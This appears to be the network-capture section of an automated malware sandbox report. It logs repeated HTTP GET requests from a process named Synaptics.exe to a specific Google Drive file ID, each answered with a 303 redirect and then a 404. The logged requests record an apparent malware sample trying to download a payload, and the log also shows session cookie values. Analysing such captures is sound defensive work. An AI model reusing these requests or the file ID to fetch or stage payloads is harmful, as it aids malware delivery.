                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=520=OM-dp6bhkhtg79xklAD4xIA-z7FHNk5sgiYtwe9uQU4WfMFr402V9JwNDcq_k6qFgzr7UHEiUo4sL27axlfLKU20pwx-trh7K4VC0SV1oqLt7LhN0lgJgXY86j07HEtnK1kbCobYTpp6nJAQW0XvlryROAv_MUj0QkOxSMMfa_aW60phebG1418L; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:13 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 58 46 30 4f 4f 47 4f 55 54 54 71 68 52 48 4b 48 54 78 5a 46 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1XF0OOGOUTTqhRHKHTxZFw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-24 21:11:13 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449758142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:17 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PU7lGoFl5yBCrh9AYsK2Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449759142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:17 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fsTaGoMIPFssAI0s1KFo6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.449764142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:20 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:19 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-onFo5sRgPaFP78ZjLeFwTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.449766142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC5fat0U7k49mXI09JjxSeGDj28OoeTy5ZJqKq6K8Cs4rhLBUfQJxLBwlCeMsB5JWtL6
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:19 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-h4r8OeM-7gi2UGyRRhujBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 47 67 6d 45 35 78 53 68 64 2d 5a 58 71 33 77 30 36 47 45 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="MGgmE5xShd-ZXq3w06GE6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.449767142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4Qa4NNLCGpAS_DrTVSpo2ryrYMrKabG7-1bYNIjt0pbA_LW6IyDFaQZixp_3fIAQIQ
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:20 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Daw1Ks3d3Gbpg5phCXiQCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 4a 68 6c 69 68 56 58 72 65 5a 67 53 36 33 44 57 39 42 62 78 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="qJhlihVXreZgS63DW9BbxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.449765142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:20 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:19 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PzXFjX-HzWsGLD2jjiJKIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.449780142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:24 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:23 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-w2Bsvcw1ZEFcDUUNqOe_uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.449781142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:24 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:23 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-M24_8DpgGwSPvClgoveObA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.449784142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:26 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:26 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-z5U-GkgGAR09EcPhUR4wdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
